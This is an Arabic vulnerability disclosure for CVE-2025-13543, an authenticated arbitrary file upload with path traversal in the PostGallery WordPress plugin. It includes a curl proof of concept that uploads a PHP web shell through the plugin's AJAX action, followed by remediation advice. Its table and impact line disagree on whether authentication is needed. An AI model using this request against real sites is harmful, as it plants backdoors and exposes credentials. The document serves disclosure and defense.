
الإفصاح عن CVE-2025-13543
إفصاح عن CVE-2025-13543
يستعرض هذا المستودع ثغرة اكتُشفت في PostGallery <= 1.12.5،إضافة ووردبريس مطوَّرة بواسطة rtowebsites.
| معرّف CVE | النوع | المكوّن | الأثر |
|---|---|---|---|
| CVE-2025-13543 | رفع ملفات تعسفي لمستخدم مُصادَق (Subscriber+) | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | يمكن لمهاجم غير مُصادَق رفع ملف تعسفي |
postgalleryAjaxUpload) والواجهة الخلفية PostGalleryUploadercurl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php وبيانات اعتماد قاعدة البيانات، ونشر بوابات خلفية دائمة، وإنشاء حسابات مسؤول مارقة.lib/ajax-actions/imageUpload.php، فرض تفويض مناسب (على سبيل المثال، طلب current_user_can('upload_files')) والتحقق من nonce تشفيري قبل معالجة عمليات الرفع.admin/PostGalleryUploader.php، تقييد uploadFolder بشكل صارم على دليل فرعي معروف من wp-content/uploads/gallery، ورفض أي قيمة تحتوي على ../ أو مسارات مطلقة، وتطبيع المسارات قبل الاستخدام.wp_handle_upload() / wp_check_filetype_and_ext() وتقييد الرفع بقائمة بيضاء من أنواع الوسائط غير القابلة للتنفيذ، مع حظر .php والامتدادات التنفيذية الأخرى صراحةً في الدلائل المتاحة عبر الويب.ظننتُ: كيف يمكن أن توجد ثغرة بهذا الشكل الذي يشبه تحديات CTF؟ رفع الملفات التعسفي وحده كارثة، لكن اليأس أن يكون هناك أيضًا اجتياز دليل. كانت إعادة إنتاج الثغرة ممتعة للغاية.
الاسم: MooseLove
الدور: باحث أمني مستقل / صياد ثغرات
التواصل: متاح عند الطلب
هذا التقرير الأمني (advisory) مقدَّم للتوعية الأمنية العامة. يمكن مشاركته بحرية مع الإشارة إلى المصدر.